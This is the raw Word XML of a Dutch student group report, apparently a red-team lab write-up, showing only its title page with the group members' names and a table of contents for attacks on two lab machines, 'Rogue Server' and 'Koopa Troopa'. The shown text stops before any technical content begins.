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5C93" w14:textId="77777777" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="00BD069A">
      <w:pPr>
        <w:spacing w:before="800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E81419B" w14:textId="49D428E8" w:rsidR="343D1AC8" w:rsidRPr="00F71CAB" w:rsidRDefault="343D1AC8" w:rsidP="223D2AF2">
      <w:pPr>
        <w:spacing w:before="200" w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71CAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Groepsopdracht</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7820FB54" w14:textId="127EF8E5" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="00702786" w:rsidP="223D2AF2">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71CAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E080FAB" w14:textId="260D88EE" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C979F2">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71CAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Academiejaar: 2025–2026</w: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DB3E42" w:rsidRPr="00F71CAB" w14:paraId="3E5DEBD0" w14:textId="77777777" w:rsidTr="223D2AF2">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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E5FE0" w14:textId="77777777" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="223D2AF2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>BD Groep 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D57C320" w14:textId="4F0BAA81" w:rsidR="223D2AF2" w:rsidRPr="00F71CAB" w:rsidRDefault="223D2AF2" w:rsidP="223D2AF2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7402475A" w14:textId="7BAA1AF9" w:rsidR="223D2AF2" w:rsidRPr="00F71CAB" w:rsidRDefault="223D2AF2" w:rsidP="223D2AF2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3ABF395B" w14:textId="4432A7C0" w:rsidR="223D2AF2" w:rsidRPr="00F71CAB" w:rsidRDefault="223D2AF2" w:rsidP="223D2AF2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CC1AD74" w14:textId="4430446B" w:rsidR="223D2AF2" w:rsidRPr="00F71CAB" w:rsidRDefault="223D2AF2" w:rsidP="223D2AF2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B6D6238" w14:textId="58246678" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C9255E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FF5A14" w:rsidRPr="00F71CAB" w14:paraId="2644B611" w14:textId="77777777" w:rsidTr="223D2AF2">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr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41A5" w14:textId="6D29CFE2" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C925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 w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:rStyle w:val="normaltextrun"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Gert-Jan Bollen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0997CC4F" w14:textId="4DAAA5CF" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="28E86A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Theme="majorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1AE920C0" w14:textId="0300702E" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="72A072AC" w:rsidP="28E86A45">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="196D3793" wp14:editId="2EB4DC41">
                  <wp:extent cx="1228725" cy="1228725"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1406778075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1605CB-4681-4A18-80B3-BED34E5CB65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78075" name="Picture 140677807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2B91" w14:textId="77777777" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C925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 w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:rStyle w:val="normaltextrun"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Levi Smeets </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C0DD65B" w14:textId="77777777" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C925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</w:p>
          <w:p w14:paraId="1DE470E3" w14:textId="723269B1" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C925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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:rStyle w:val="wacimagecontainer"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="130DA536" wp14:editId="0D87D07A">
                  <wp:extent cx="1076325" cy="1238250"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="1066702065" name="Afbeelding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6CDE02-7D30-420C-A5CE-AD15860218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30E6" w14:textId="77777777" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C9255E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="normaltextrun"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:rStyle w:val="normaltextrun"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Remy Brouwers </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2DE4E1" w14:textId="2155A27C" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C9255E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="normaltextrun"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34215C61" w14:textId="697B36BB" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00EE2E02" w:rsidP="00C9255E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36EFA3D6" wp14:editId="226D24E8">
                  <wp:extent cx="1228896" cy="1238423"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="761192369" name="Afbeelding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577FB2-A35B-4EC5-A271-1449CB810D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923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8BF5477" w:rsidRPr="00F71CA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F5D81F" wp14:editId="1B1D2CE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9525</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1211580" cy="1242060"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="1882885952" name="Afbeelding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68171DD-D5CD-464D-A01C-CB075419C1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2" r="29082" b="1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A429" w14:textId="48E1EC8D" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="00C925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rial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:rStyle w:val="normaltextrun"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Robbe Koreman</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ABE1353" w14:textId="77777777" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="00306849" w:rsidP="264E280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Theme="majorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01048A92" w14:textId="287EEAB3" w:rsidR="00306849" w:rsidRPr="00F71CAB" w:rsidRDefault="73843A51" w:rsidP="00C9255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 w:rsidRPr="00F71CAB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FDB2511" wp14:editId="40D8E9F9">
                  <wp:extent cx="1252693" cy="1252693"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
                  <wp:docPr id="293012720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E9474F-5188-40C0-872B-C44DC415F4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12720" name="Picture 2930127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166" cy="1253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6B2B0" w14:textId="77777777" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="00BD069A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D11D671" w14:textId="77777777" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="00BD069A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F1DDB5" w14:textId="77777777" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="00BD069A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356DDB78" w14:textId="77777777" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="00581BCA">
      <w:r w:rsidRPr="00F71CAB">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc1693911150" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:id w:val="1832075796"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="5289628F" w14:textId="2F0119EE" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="3F60F78E" w:rsidP="00C6772B">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
            <w:rPr>
              <w:lang w:val="nl-NL"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="24730F8F">
            <w:rPr>
              <w:lang w:val="nl-NL"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w14:paraId="4A019872" w14:textId="0C094A34" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="52E3155C" w:rsidP="10AC6BEF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10AC6BEF">
            <w:instrText>TOC \o "1-3" \z \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc1693911150">
            <w:r w:rsidR="24730F8F" w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="24730F8F" w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contents</w:t>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText>PAGEREF _Toc1693911150 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007265A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="10AC6BEF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A423723" w14:textId="2F79C3C3" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6BEF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6032529">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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Rogue Server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_Toc136032529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3</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="194A1EDF" w14:textId="2401AF93" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6B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24490632">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.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Reconnaissance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_Toc1324490632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3</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B8F0CBB" w14:textId="28016941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05586306">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1.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Exposed services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_Toc1005586306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3</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49E832DB" w14:textId="4E9E0D13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17415488">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2.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Technology used in tool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_Toc2117415488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3</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BF3DBFD" w14:textId="115083D8" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6B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12235083">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.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Initial foothold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_Toc512235083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4</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="054B705A" w14:textId="3057D124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60076993">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1.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Initial user access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_Toc1360076993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4</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A21CE7D" w14:textId="616FF73E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3411617">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.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User accounts &amp; Flag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_Toc53411617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5</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DFB682D" w14:textId="31DC3AD5" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6B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962124396">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.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Privilege escalation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_Toc1962124396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5</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70D86D39" w14:textId="39116A04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67943449">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1.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Commands user can run as root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_Toc267943449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5</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39E30C9B" w14:textId="1A37F2E6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75312950">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2.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Flag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_Toc675312950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5</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56677B89" w14:textId="5FAD3772" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6BEF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11150662">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.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Koopa Troopa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_Toc1311150662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7</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AFB1FD1" w14:textId="6F0BA181" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6B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2324609">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.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Reconnaissance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_Toc162324609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7</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F008817" w14:textId="37FD3826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21391540">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1.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Exposed services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_Toc921391540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7</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0271BB2B" w14:textId="4C67FF13" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6B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94954348">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.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Initial foothold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_Toc1694954348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8</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="602607CF" w14:textId="3C9E041C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174614387">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1.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Initial user access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_Toc1174614387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8</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E0669F8" w14:textId="002BBF63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8281092">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2.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User accounts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_Toc88281092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9</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="471C0A70" w14:textId="5853F596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8823864">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3.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Flag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_Toc38823864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9</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19C93F22" w14:textId="0085EEAC" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6BEF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173891180">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.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Privilege escalation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_Toc1173891180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10</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5887CA06" w14:textId="71529EC7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49656563">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1.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Kernel version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_Toc249656563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10</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C5E3DBD" w14:textId="5D5B6117" w:rsidR="00752FA9" w:rsidRPr="00F71CAB" w:rsidRDefault="24730F8F" w:rsidP="10AC6BEF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9015"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1949146911">
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2.</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="24730F8F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText>PAGEREF _Toc1949146911 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007265A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="52E3155C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="52E3155C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="229A894F" w14:textId="42BDEEFA" w:rsidR="001B2C9B" w:rsidRPr="00F71CAB" w:rsidRDefault="001B2C9B"/>
    <w:p w14:paraId="0061BA91" w14:textId="273C8F08" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="001B2C9B">
      <w:r w:rsidRPr="00F71CAB">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD0A70" w14:textId="53863025" w:rsidR="008C088D" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc136032529"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rogue Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="15E883C8" w14:textId="77777777" w:rsidR="00580016" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="000D1EB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc1324490632"/>
